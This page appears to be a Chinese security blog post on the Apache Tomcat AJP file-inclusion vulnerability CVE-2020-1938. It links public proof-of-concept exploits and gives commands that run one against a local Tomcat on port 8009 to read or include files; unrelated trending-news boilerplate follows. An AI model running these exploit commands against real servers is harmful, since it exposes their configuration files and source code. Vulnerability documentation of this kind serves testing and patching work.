Bella
分享文章
新闻分类
ApacheTomcat Ajp漏洞
Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。
此漏洞为文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。
本次设计到的CVE:CNVD-2020-10487、CVE-2020-1938
EXP-1
https://github.com/0nise/CVE-2020-1938
apache-tomcat-8.5.32.zip 测试tomcat
任意文件读取
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp
文件包含
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp
打包方式:在目录tomcat/ajp-bug 执行 mvn clean compile assembly:assembly
EXP-2
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
[超站]友情链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
关注网络尖刀微信公众号随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 锣鼓迎新春 舞乐庆华年 7949362
- 2 第一批返程的人已经堵路上了 7999712
- 3 每到过年人类幼崽衣服就洗得特别勤 7896862
- 4 南北民俗闹新春 欢欢喜喜过大年 7743916
- 5 从春晚配角到主角他熬了20年 7674273
- 6 普陀山消防员 制止不了就加入 7500786
- 7 饺子导演手绘破亿海报笔要画冒烟了 7424043
- 8 男孩井盖点鞭炮受损车主回应 7357652
- 9 妈妈将女儿扮成哪吒超像的 7237259
- 10 “以旧换新”激发消费新活力 7159276
微信
新浪微博
